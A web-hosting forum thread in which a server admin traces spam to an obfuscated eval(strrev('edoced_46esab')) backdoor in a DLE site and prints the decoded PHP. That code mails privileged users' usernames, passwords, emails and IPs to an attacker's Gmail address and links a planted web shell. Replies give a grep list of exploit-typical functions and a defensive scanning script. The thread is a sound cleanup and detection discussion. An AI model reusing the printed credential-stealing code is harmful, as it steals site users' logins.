Status
Not open for further replies.

ashutariyal

Active Member
Is there any way on a Linux server with WHM to stop sending mails to a particular email ID (from the server's PHP script) or to redirect them to another email ID?

Please help!
 
11 comments
Hello,

Please illustrate more. What exactly is it doing? Is there a script on the server sending out very many emails to one person, or to many? There must also be a cronjob set up or something.

Also what kind of emails are those being sent out?
 
Thanks for your reply,

This is one kind of hacking. I have checked every script and found that it is "X-Mailer: DLE PHP", so I have replaced all files with new ones, but the script (which I still have not found) is still sending mails to a Gmail email ID in this format:

Code:
Acount: [  Editor  | username | password | email id | ip ] -     Admin mail:
 Hack Shell: http:// link of the script (which I already removed)

In every email there is only one account's details.

(which is killing my Exim and the server is going into overload)

Regards,
 
Config Mail Manage

Install this WHM plugin and you can limit each domain's mails per hour and set config options per domain.

Code:
cd /
wget http://www.configserver.com/free/cmm.tgz
tar -xzf cmm.tgz
cd cmm/
sh install.sh


But you should secure/update your script to solve the problem :P
 
Also check the cronjob, which must be active.

Check this:

go to /etc/crontab

then do an ls

and see any cronjobs and delete them.

Thanks & Regards
 
You can try doing a grep -RPn for some of the following; they are very common vars of exploits:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab (base64_decode used backwards to avoid detection by string searches like this)
  • chmod
  • mkdir
  • `` (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile
Granted, this may give a lot of false positives, but it is better than nothing.
 
Thanks mate for your quick and fast support and help. Now I have figured out the script, which is decoded with edoced_46esab (it was in one of my files).
Code:
$oO0oO00Oo0Oo = strrev('edoced_46esab');
eval($oO0oO00Oo0Oo('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'));
and after decoding with http://base64-encoder-online.waraxe.us/ I got this:
Code:
/*-----------------------------*/
// carry out the hack /////////////////////////////////////////////

include_once ENGINE_DIR.'/data/config.php';
include_once ENGINE_DIR.'/classes/mail.class.php';

$id = $member_id['user_group'];
$group = "Nhom";   // Vietnamese for "Group"; overwritten below

// Label the email as admin or member depending on the user level
switch ($id) {
    case 1:
        $group = " Administrator ";
        break;
    case 2:
        $group = " Moderator ";
        break;
    case 3:
        $group = " Editor ";
        break;
    default:
        $group = " Member ";
        break;
}
$email_title = " Acount " .
               $group .
               " on domain " .
               $config['http_home_url'];

// $_name, $_pass and $_IP are the login name, password and client IP
// captured by the DLE login code this block was injected into
$_email = $member_id['email'];
$data_hak = '[ ' . $group .
            ' | ' . $_name .
            ' | ' . $_pass .
            ' | ' . $_email .
            ' | ' . $_IP .
            ' ] - ';

$email_msg = " Acount: " . $data_hak;
// base64 of the attacker's address; decodes to noreply.hak@gmail.com
$email_to = base64_decode("bm9yZXBseS5oYWtAZ21haWwuY29t");
$mail_admin = $config['admin_mail'];
$email_msg .= "    Admin mail: " . $mail_admin;

// Link to the web shell planted under the TinyMCE theme directory
$email_msg .= " \n Hack Shell: " .
$config['http_home_url'] . "engine/editor/jscripts/tiny_mce/themes/advanced/index.php";
// Only privileged accounts (admin, moderator, editor) are reported
if ($id == 1 || $id == 2 || $id == 3) {
    $mail_obj = new dle_mail ($config, true);

    $mail_obj->send ($email_to, $email_title, $email_msg);

    /*echo "<script type=\"text/javascript\">
            alert(\"You have logged in ". $email_msg
                          . " successfully\");
        </script>";*/

}
/////////////////////////////////////////////////////////////////
/*-----------------------------*/
So this is my personal advice to all of my webmaster friends: never use any script from viethak . com.
Second, if you use any nulled script, first check all files.

Thanks & Regards,
 
I would check this file as well:
engine/editor/jscripts/tiny_mce/themes/advanced/index.php

A good way to check scripts is, when you download them, to check the last-updated timestamp on the files; if a file was modified some time after the other files, check it out :)
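The two checks suggested in this thread, the recursive grep for suspect function names and the "which files are newer than the rest" timestamp comparison, put together as an added worked example. This is not code from any poster here or from the CMM plugin: it builds a throwaway webroot with one clean file and one planted file using the same strrev('edoced_46esab') trick shown above (the planted payload is a harmless phpinfo() call, constructed for the demo), greps it, lists files newer than a known-good file, and decodes the base64 argument of the eval so you can read what was hidden. The file names and the 2008 backdate are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not from the thread. Constructed sample webroot: one clean
# index.php and one planted file under engine/editor/ that uses the reversed
# function-name trick. The payload is only "phpinfo();" so it is safe to keep.
make_sample_webroot() {
  dir=$(mktemp -d)
  mkdir -p "$dir/engine/editor"
  cat > "$dir/index.php" <<'EOF'
<?php
echo "hello";
EOF
  cat > "$dir/engine/editor/index.php" <<'EOF'
<?php
$f = strrev('edoced_46esab');
eval($f('cGhwaW5mbygpOw=='));
EOF
  # Backdate the legitimate file (assumed 2008 release date for the demo) so the
  # planted file stands out as the one modified after the rest of the package.
  touch -t 200801010000 "$dir/index.php"
  printf '%s\n' "$dir"
}

# Recursive grep for the names listed in the thread, plus eval( and strrev(,
# which the decoded sample above relied on. -E rather than -P so it also runs
# on non-GNU grep; prints file:line:text for every hit.
scan_php() {
  grep -RnE --include='*.php' \
    'passthru|shell_exec|system\(|phpinfo|base64_decode|edoced_46esab|chmod\(|mkdir\(|`[^`]+`|fopen\(|fclose\(|readfile\(|eval\(|strrev\(' \
    "$1"
}

# Timestamp check: every file under $1 modified after reference file $2.
# Pick a reference file you know shipped with the original package.
newer_than() {
  find "$1" -type f -newer "$2"
}

# Pull the base64 literal out of a line such as eval($f('...')) in file $1 and
# decode it, so the hidden code can be read without running it.
decode_eval_arg() {
  sed -n "s/.*eval(\$[A-Za-z0-9_]*('\([A-Za-z0-9+\/=]*\)')).*/\1/p" "$1" | base64 -d
}

if [ "${1:-}" = "demo" ]; then
  root=$(make_sample_webroot)
  echo "== suspect strings =="
  scan_php "$root"
  echo "== files newer than index.php =="
  newer_than "$root" "$root/index.php"
  echo "== decoded eval argument =="
  decode_eval_arg "$root/engine/editor/index.php"
  echo
  rm -rf "$root"
fi
```

Run it as `sh scan.sh demo`. On a real server point scan_php at the document root and newer_than at a file that came with the original package; as the poster above says, the grep will produce false positives on legitimate code, so treat the hits as a reading list, not a verdict.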
 